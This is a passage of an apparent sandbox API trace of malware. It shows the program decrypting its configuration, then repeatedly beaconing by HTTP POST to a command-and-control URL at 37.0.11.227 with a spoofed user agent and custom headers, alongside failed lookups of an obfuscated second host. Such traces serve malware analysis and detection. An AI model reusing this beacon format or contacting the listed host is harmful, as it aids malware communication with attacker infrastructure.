[0316.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.795] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.796] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.796] GetProcessHeap () returned 0x690000 [0316.796] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0316.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.797] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0316.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.798] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0316.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0316.799] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0316.799] GetProcessHeap () returned 0x690000 [0316.799] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0316.800] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.800] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0316.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.892] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0316.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.893] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0316.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0316.894] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0316.894] GetProcessHeap () returned 0x690000 [0316.894] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0316.894] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0316.894] GetProcessHeap () returned 0x690000 [0316.894] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0316.894] socket (af=2, type=1, protocol=6) returned 0xac8 [0316.895] connect (s=0xac8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0316.931] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0316.931] GetProcessHeap () returned 0x690000 [0316.931] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0316.931] GetProcessHeap () returned 0x690000 [0316.931] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0316.932] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0316.933] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0316.933] GetProcessHeap () returned 0x690000 [0316.933] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0316.933] GetProcessHeap () returned 0x690000 [0316.933] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0316.933] GetProcessHeap () returned 0x690000 [0316.933] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0316.933] GetProcessHeap () returned 0x690000 [0316.933] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0316.934] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0316.935] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0316.935] GetProcessHeap () returned 0x690000 [0316.935] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0316.935] GetProcessHeap () returned 0x690000 [0316.935] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0316.935] send (s=0xac8, buf=0x6ad508*, len=242, flags=0) returned 242 [0316.936] send (s=0xac8, buf=0x6aba40*, len=159, flags=0) returned 159 [0316.936] GetProcessHeap () returned 0x690000 [0316.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0316.936] recv (in: s=0xac8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0317.025] GetProcessHeap () returned 0x690000 [0317.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0317.026] GetProcessHeap () returned 0x690000 [0317.027] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0317.027] GetProcessHeap () returned 0x690000 [0317.069] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0317.069] GetProcessHeap () returned 0x690000 [0317.070] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0317.070] closesocket (s=0xac8) returned 0 [0317.072] GetProcessHeap () returned 0x690000 [0317.072] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0317.072] GetProcessHeap () returned 0x690000 [0317.073] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0317.073] GetProcessHeap () returned 0x690000 [0317.074] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0317.074] GetProcessHeap () returned 0x690000 [0317.075] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0317.076] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x180c) returned 0xac8 [0317.080] Sleep (dwMilliseconds=0xea60) [0317.081] GetProcessHeap () returned 0x690000 [0317.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0317.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.086] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.104] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0317.226] GetProcessHeap () returned 0x690000 [0317.226] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0317.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.227] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0317.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.228] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0317.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.229] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.229] GetProcessHeap () returned 0x690000 [0317.229] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0317.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.230] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0317.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.231] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0317.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.232] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0317.232] GetProcessHeap () returned 0x690000 [0317.232] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0317.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0317.233] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0317.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0317.234] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0317.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0317.234] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0317.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0317.235] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0317.239] GetProcessHeap () returned 0x690000 [0317.239] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0317.239] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0317.240] GetProcessHeap () returned 0x690000 [0317.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0317.241] GetProcessHeap () returned 0x690000 [0317.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0317.242] GetProcessHeap () returned 0x690000 [0317.242] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0317.243] GetProcessHeap () returned 0x690000 [0317.243] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0317.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.246] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.268] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0317.310] GetProcessHeap () returned 0x690000 [0317.310] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0317.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.311] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0317.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.312] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0317.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.313] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.313] GetProcessHeap () returned 0x690000 [0317.313] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0317.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.314] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0317.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.376] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0317.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.376] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0317.376] GetProcessHeap () returned 0x690000 [0317.377] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0317.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0317.378] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0317.378] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0317.378] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0317.379] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0317.379] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0317.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0317.381] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0317.381] GetProcessHeap () returned 0x690000 [0317.381] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0317.381] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0317.381] GetProcessHeap () returned 0x690000 [0317.381] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0317.381] socket (af=2, type=1, protocol=6) returned 0xacc [0317.382] connect (s=0xacc, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0317.432] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0317.432] GetProcessHeap () returned 0x690000 [0317.432] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0317.432] GetProcessHeap () returned 0x690000 [0317.432] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0317.432] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0317.433] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0317.433] GetProcessHeap () returned 0x690000 [0317.433] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0317.433] GetProcessHeap () returned 0x690000 [0317.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0317.434] GetProcessHeap () returned 0x690000 [0317.434] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0317.434] GetProcessHeap () returned 0x690000 [0317.434] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0317.557] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0317.557] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0317.557] GetProcessHeap () returned 0x690000 [0317.557] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0317.558] GetProcessHeap () returned 0x690000 [0317.558] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0317.558] send (s=0xacc, buf=0x6ad508*, len=242, flags=0) returned 242 [0317.559] send (s=0xacc, buf=0x6aba40*, len=159, flags=0) returned 159 [0317.559] GetProcessHeap () returned 0x690000 [0317.559] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6cd7d8 [0317.559] recv (in: s=0xacc, buf=0x6cd7d8, len=4048, flags=0 | out: buf=0x6cd7d8*) returned 204 [0317.639] GetProcessHeap () returned 0x690000 [0317.639] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0317.639] GetProcessHeap () returned 0x690000 [0317.640] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0317.679] GetProcessHeap () returned 0x690000 [0317.680] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0317.680] GetProcessHeap () returned 0x690000 [0317.680] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0317.680] closesocket (s=0xacc) returned 0 [0317.681] GetProcessHeap () returned 0x690000 [0317.681] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0317.681] GetProcessHeap () returned 0x690000 [0317.681] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0317.681] GetProcessHeap () returned 0x690000 [0317.682] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0317.682] GetProcessHeap () returned 0x690000 [0317.682] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0317.682] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6cd7d8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1810) returned 0xacc [0317.684] Sleep (dwMilliseconds=0xea60) [0317.685] GetProcessHeap () returned 0x690000 [0317.685] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0317.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.686] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0317.995] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0318.003] GetProcessHeap () returned 0x690000 [0318.003] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0318.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.007] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0318.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.009] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.010] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.010] GetProcessHeap () returned 0x690000 [0318.011] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0318.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.012] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0318.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.014] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0318.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.015] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0318.015] GetProcessHeap () returned 0x690000 [0318.015] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0318.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.016] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0318.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.018] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0318.018] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.019] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0318.019] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.020] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0318.020] GetProcessHeap () returned 0x690000 [0318.020] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0318.020] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0318.020] GetProcessHeap () returned 0x690000 [0318.021] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0318.021] GetProcessHeap () returned 0x690000 [0318.021] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0318.022] GetProcessHeap () returned 0x690000 [0318.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0318.022] GetProcessHeap () returned 0x690000 [0318.022] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0318.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.023] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.027] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0318.032] GetProcessHeap () returned 0x690000 [0318.032] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0318.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.033] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0318.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.034] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.035] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.035] GetProcessHeap () returned 0x690000 [0318.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0318.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.036] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0318.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.037] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0318.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.038] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0318.038] GetProcessHeap () returned 0x690000 [0318.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0318.038] LoadLibraryW (lpLibFileName="shlwapi") returned 